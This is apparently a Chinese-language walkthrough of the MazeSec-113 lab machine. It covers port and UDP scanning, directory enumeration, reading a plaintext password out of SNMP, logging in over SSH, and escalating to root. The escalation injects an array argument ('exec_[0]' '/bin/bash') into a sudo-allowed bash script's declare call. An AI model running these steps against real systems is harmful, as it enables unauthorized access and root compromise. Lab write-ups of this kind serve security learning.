MazeSec-113

信息搜集

端口扫描

shell 复制代码
┌──(kali㉿kali)-[~]
└─$ nmap -A -p- 192.168.21.7
Starting Nmap 7.99 ( https://nmap.org ) at 2026-10-07 05:38 -0400
Nmap scan report for 192.168.21.7
Host is up (0.00065s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Mazesec welcome u
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:66:46:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.65 ms 192.168.21.7

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.59 seconds

漏洞利用

看一下80端口有什么

shell 复制代码
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.21.7
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Mazesec welcome u</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: #f5f5f5;
            font-family: Arial, sans-serif;
        }
        
        .quote {
            font-size: 2.5rem;
            text-align: center;
            color: #333;
            padding: 20px;
            max-width: 800px;
        }
    </style>
</head>
<body>
    <div class="quote">
        The quieter you become, the more you are able to hear.
    </div>
</body>
</html>

目录枚举

shell 复制代码
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.21.7 -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.21.7
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              html,php,txt,jpg,png,zip,git
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 796]
server-status        (Status: 403) [Size: 277]
logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 277]
Progress: 9482016 / 9482016 (100.00%)
===============================================================
Finished
===============================================================

没发现什么能走的方向了,在扫一下udp端口

shell 复制代码
┌──(kali㉿kali)-[~]
└─$ nmap -sU --min-rate=10000 192.168.21.7 
Starting Nmap 7.99 ( https://nmap.org ) at 2026-10-07 06:54 -0400
Nmap scan report for 192.168.21.7
Host is up (0.00049s latency).
Not shown: 993 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
161/udp   open   snmp
MAC Address: 08:00:27:66:46:FA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.99 seconds

看一下snmp有什么https://hacktricks.wiki/network-services-pentesting/pentesting-snmp/index.html

shell 复制代码
┌──(kali㉿kali)-[~]
└─$ snmpbulkwalk -c public -v2c 192.168.21.7
iso.3.6.1.2.1.25.4.2.1.4.383 = STRING: "service --user welcome --password mMOq2WWONQiiY8TinSRF --host localhost --port 8080"

使用账号密码尝试登陆一下

shell 复制代码
┌──(kali㉿kali)-[~]
└─$ ssh welcome@192.168.21.7                
The authenticity of host '192.168.21.7 (192.168.21.7)' can't be established.
ED25519 key fingerprint is: SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.21.7' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
welcome@192.168.21.7's password: 
Linux 113 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jan 14 08:32:23 2026 from 192.168.3.94
welcome@113:~$ id
uid=1000(welcome) gid=1000(welcome) groups=1000(welcome)

权限提升

shell 复制代码
welcome@113:~$ ls -la
total 24
drwxr-xr-x 2 welcome welcome 4096 Jan 14  2026 .
drwxr-xr-x 3 root    root    4096 Apr 11  2025 ..
lrwxrwxrwx 1 root    root       9 Jan 14  2026 .bash_history -> /dev/null
-rw-r--r-- 1 welcome welcome  220 Apr 11  2025 .bash_logout
-rw-r--r-- 1 welcome welcome 3526 Apr 11  2025 .bashrc
-rw-r--r-- 1 welcome welcome  807 Apr 11  2025 .profile
-rw-r--r-- 1 root    root      44 Jan 14  2026 user.txt
welcome@113:~$ sudo -l
Matching Defaults entries for welcome on 113:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on 113:
    (ALL) NOPASSWD: /opt/113.sh
welcome@113:~$ cat /opt/113.sh
#!/bin/bash

sandbox=$(mktemp -d)
cd $sandbox

if [ "$#" -ne 3 ];then
        exit
fi

if [ "$3" != "mazesec" ]
then
        echo "\$3 must be mazesec"
        exit 
else
        /bin/cp /usr/bin/mazesec $sandbox
        exec_="$sandbox/mazesec"
fi
//只检查了字符串exec_。如果传入exec_[0],declare会把exec_变成数组,并设置第0个元素为/bin/bash。之后$exec_等价于${exec_[0]},于是执行/bin/bash,而脚本本身是通过sudo以root运行的,所以得到root shell
if [ "$1" = "exec_" ];then
        exit
fi

declare -- "$1"="$2"
$exec_
welcome@113:~$ sudo /opt/113.sh 'exec_[0]' '/bin/bash' mazesec
root@113:/tmp/tmp.fLo2tSwt6k# id
uid=0(root) gid=0(root) groups=0(root)
相关推荐
白猫不黑3 小时前
网络安全专业:从入门到进阶的完整学习路线
学习·安全·web安全·计算机·网络安全·信息安全·编程
菩提小狗3 小时前
每日安全情报报告 · 2026-10-07
网络安全·漏洞·cve·安全情报·每日安全
白猫不黑3 小时前
AI自动化漏洞挖掘从入门到进阶超详细学习路线
人工智能·学习·web安全·网络安全·信息安全·渗透测试·自动化
学逆向的5 小时前
远程线程注入
开发语言·jvm·网络安全·win32
在猴站学算法5 小时前
(实战)PHP文件包含漏洞
网络安全·php
pencek6 小时前
MazeSec-Loooower
网络安全
lisw0521 小时前
数字断点如何影响供应链——并危及全球经济?
网络安全·网络攻击模型·前沿领域
sbjdhjd1 天前
云安全 | Docker 容器逃逸复盘(二):2375 未授权接口如何突破容器管理边界
网络安全·docker·云原生·数据挖掘·开源·云计算·云安全
HackTwoHub1 天前
Clown SRC skill第二代2.x最新版企业安全研究 Skill|证据优先的 SRC 与白盒审计工作流正式更新
网络·安全·web安全·网络安全·系统安全·密码学·安全架构